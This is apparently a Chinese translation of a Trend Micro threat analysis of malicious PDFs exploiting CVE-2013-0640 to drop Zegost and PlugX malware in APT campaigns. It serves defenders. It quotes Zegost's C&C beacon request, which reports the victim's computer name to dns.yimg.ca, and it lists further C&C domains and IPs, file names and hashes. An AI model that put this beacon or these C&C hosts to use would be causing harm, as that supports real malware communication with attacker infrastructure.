隐藏在 PDF 中的 APT 攻击代码

作者：趋势科技

在 2012 年，我们看到了各式各样的 APT攻击活动利用 Microsoft Word 的漏洞 – CVE-2012-0158。这是一种转变，之前最常被利用的 Word 漏洞是 CVE-2010-3333。虽然我们还是继续看到 CVE-2012-0158 被大量的使用，但我们也注意到恶名昭彰的MiniDuke 攻击所制造的针对 Adobe Reader 漏洞 – CVE-2013-0640 的攻击程序代码使用量正在增加。这些恶意 PDF 文件所植入的恶意软件和 MiniDuke 并无关系，但却和正在进行中的APT-高级持续性渗透攻击活动有关。

通过恶意 PDF 攻击程序代码进行的 APT 攻击正在大量增加

Zegost

趋势科技所发现的一组恶意 PDF 文件，包含上述漏洞攻击码的诱饵，使用了越南文，文件名也是相同的语言。

图一、诱饵文件样本

这些 PDF 文件内嵌与 MiniDuke 攻击活动类似的 JavaScript 程序代码。相似之处包括了类似的函数和变量名。

图二、类似的 JavaScript 程序代码

使用 Didier Steven 的 PDFiD 工具分析该 PDF 文件发现，这两个 PDF 文件非常相似。虽然并非完全相同，但两者之间的相似之处是难以否认的。有意思的地方是「/Javascript」、「/OpenAction」和「/Page」。这些地方分别代表有 JavaScript 出现，有某种自动行为出现和页码的具体信息。这三个项目可以帮我们确认 MiniDuke 和 Zegost 的相似之处。

植入的文件和数据也差不多。这两种攻击活动都植入了相同数量的文件，有着非常相似的文件名与类似的目的。即使注册表的修改部分也很类似。

不过这也是所有相似之处。这些 PDF 所植入的文件被称为 Zegost（或 HTTPTunnel），曾经在之前的攻击里发现过。和 MiniDuke 攻击所植入的恶意软件并无关联。Zegost 恶意软件有个鲜明的特征：

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: dns.yimg.ca

Cache-Control: no-cache

命令和控制服务器 – dns.yimg.ca 所反查出的 IP – 223.26.55.122，一直被用在比较知名的命令和控制服务器上，例如imm.conimes.com 和 iyy.conimes.com。用来注册该域名的电子邮件地址 – llssddzz@gmail.com，也曾被用来注册scvhosts.com（另外一个已知的 C＆C 服务器器）和updata-microsoft.com，应该也是有问题的域名。

PlugX

第二组恶意 PDF 文件间并不一定都直接有关联，虽然它们都会值入不同的 PlugX 变种。我们所分析的攻击似乎主要针对日本、韩国和印度的目标。

然而虽然这些攻击也利用了漏洞 – CVE-2013-0640，但是它们和上面所讨论的样本不同。比较文件时就可以看出差异，例如使用的 PDF 格式版本：

ZegostMiniDukePlugX PDF Header: %PDF-1.4 PDF Header: %PDF-1.4 PDF Header: %PDF-1.7 obj                    8 obj                    8 obj                   43 endobj                 8 endobj                 8 endobj                44 stream                 3 stream                 1 stream                10 endstream              3 endstream              2 endstream             11 xref                   1 xref                   1 xref                   4 trailer                1 trailer                1 trailer                4 startxref              1 startxref              1 startxref              4 /Page                  1 /Page                  1 /Page                  6 /Encrypt               0 /Encrypt               1 /Encrypt               0 /ObjStm                0 /ObjStm                0 /ObjStm                0 /JavaScript            1 /JavaScript            1 /JavaScript            1 /AA                    0 /AA                    0 /AA                    0 /OpenAction            1 /OpenAction            1 /OpenAction            1 /AcroForm              1 /AcroForm              1 /AcroForm              1 /JBIG2Decode           0 /JBIG2Decode           0 /JBIG2Decode           0 /RichMedia             0 /RichMedia             0 /RichMedia             0 /Launch                0 /Launch                0 /Launch                0 /EmbeddedFile          0 /EmbeddedFile          0 /EmbeddedFile          0 /XFA                   1 /XFA                   1 /XFA                   1 /Colors > 2^24         0 /Colors > 2^24         0 /Colors > 2^24         0

PlugＸ 也会植入文件和数据，但是却和 Zegost 或 MiniDuke 都不相同。文件数量不同，植入原因也不同。

ZegostMiniDukePlugXUserCache.binUserCache.binUserCache.bin39f5d27d1a5e34ce9863406b799ef47a39f5d27d1a5e34ce9863406b799ef47a39f5d27d1a5e34ce9863406b799ef47aACECache10.lstACECache10.lstACECache10.lsta1bb36552f1336466b4d72894839358577402ee32c656d68eeb8a07e2a041dfb77e16369d995628ff9df31c56129a2f2A9RD50B.tmp (PDF)A9RE077.tmp (PDF)SharedDataEventsdd28e2e06465464f0cb5eca4a901342185b890c0b10faa13014d4a22dae3fe3c1a8d23271be2c45f31a537eaefbbf55dA9RD50A.tmp (PDF)A9RE078.tmp (PDF)SharedDataEvents-journal4f4ceedd8da84be88dbea7b49f1b82e5e719894252665a7cbf8efc18babdd70e4754e6d5ea3b6ca2357146a1e56c3c47  SharedDataEvents-journal  b16f24e72c42059cd44a9fb48ea8bf98  A9RD53D.tmp (PDF)  200569e47e6e5a3f629533423d4ba03b  SharedDataEvents-journal  b930ef3a77e6c4669312f582fc405f61  SharedDataEvents-journal  38149cfb66075a9009d460e86c138141  SharedDataEvents-journal  566ea4be505009d422d5fd6c395a33b9  A9RD53C.tmp (PDF)  ca79b7a45410dd1e995a4997dcc6d126

PlugX:HHX

PlugX 的第一组变种会利用 Microsoft HTML 辅助说明编译程序，就如同这篇文章所描述的一样。我们已经看到这变种被用在目标攻击活动中。在这个案例中，攻击者对目标发送了一封电子邮件，诱使他们打开恶意附件文件。

我们所分析的样本会将文件植入文件夹 hhx 中，并且利用正常的 Microsoft 文件 hhx.exe 载入 hha.dll，接着再载入 hha.dll.bak。我们分析文件所使用的命令和控制服务器是 14.102.252.142。

PlugX：PDH

我们所分析的第二组 PlugX 变种，会将文件植入到文件夹 PDH 中，并且利用已经签名过的 QQ 浏览器更新服务文件载入 PDH.dll，接着会载入 PDH.pak。

图三、签名过的文件

这些文件会利用 dnsport.chatnook.com、inter.so-webmail.com 和 223.25.242.45 做为命令和控制服务器。

结论

趋势科技的研究显示这些 APT 活动的攻击者开始利用 MiniDuke 攻击活动所制造的漏洞攻击码，并将其加入到自己的军火库中。与此同时，我们也发现似乎有其他 APT 攻击活动已经开发出自己的方式来利用相同的漏洞。攻击漏洞 – CVE-2013-0640 的恶意 PDF 数量增加，也代表了 APT 攻击者从使用恶意 Word 档案攻击相对老旧的漏洞 – CVE-2012-0158 开始转移阵地了。

＠原文出处：Malicious PDFs On The Rise

 

 

本文版权为趋势科技所有，对于非赢利网站或媒体转载请注明作者以及原文链接。谢谢合作！